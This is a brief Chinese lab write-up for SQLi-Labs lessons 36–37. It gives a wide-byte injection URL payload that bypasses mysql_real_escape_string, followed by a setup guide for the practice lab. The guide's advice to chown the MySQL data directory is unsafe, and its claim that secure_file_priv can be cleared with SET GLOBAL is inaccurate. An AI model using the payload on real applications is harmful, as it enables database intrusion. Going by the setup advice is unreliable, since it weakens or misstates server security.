SQLi Labs Lesson36 & Lesson37

Lesson - 36

GET - Bypass MySQL_real_escape_string


构造 ?id=0%bf%27%20union%20select%201,database(),3--+


Lesson - 37

POST - Bypass MySQL_real_escape_string



### 如何下载和安装 SQLi-Lab 渗透测试工具 #### 下载 SQLi-Lab 工具 可以通过 GitHub 上的官方仓库获取 SQLi-Lab 的源码。以下是具体的地址以及操作方式: 访问以下链接可以找到 SQLi-Labs 的项目页面: ```plaintext https://github.com/Audi-1/sqli-labs ``` 执行克隆命令来下载该项目到本地环境: ```bash git clone https://github.com/Audi-1/sqli-labs.git ``` 此命令会将整个项目的代码复制到用户的计算机上。 #### 安装依赖项并设置 MySQL 数据库 完成下载后,需按照如下说明配置环境以便正常运行 SQLi-Labs 实验室。 ##### 步骤一:准备 MySQL 环境 如果遇到无法启动数据库的情况,可能是因为 `/var/lib/mysql` 文件夹的权限不足[^2]。此时可尝试更改该目录的所有权至当前用户账户下: ```bash sudo chown -R $USER:$USER /var/lib/mysql ``` ##### 步骤二:初始化实验室所需的数据库结构 进入解压后的 `sqli-labs` 路径,在其中寻找用于构建实验场景的相关脚本文件。通常情况下,这些脚本位于子目录下的 `.sql` 文件中。通过 MySQL 命令加载它们以建立必要的表单与数据记录。 ```bash mysql -u root -p < path/to/your/sql_script.sql ``` 随后验证是否能够顺利连接目标实例中的各个模式(schema),确认无误后再继续后续环节的操作流程[^1]。 ##### 特殊情况处理 —— secure-file-priv 权限控制 某些高级挑战涉及利用特定函数导出敏感资料到外部存储设备的功能;然而默认状态下服务器端可能会禁用此类行为从而阻止攻击面扩展。因此当碰到提示错误信息类似于 “The used command is not allowed...” 时,则需要调整全局参数允许指定位置之外保存文档的动作发生[^3]: ```sql SET GLOBAL secure_file_priv = ''; ``` 以上即为完整的 SQL 注入学习平台搭建指南及其注意事项概述。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值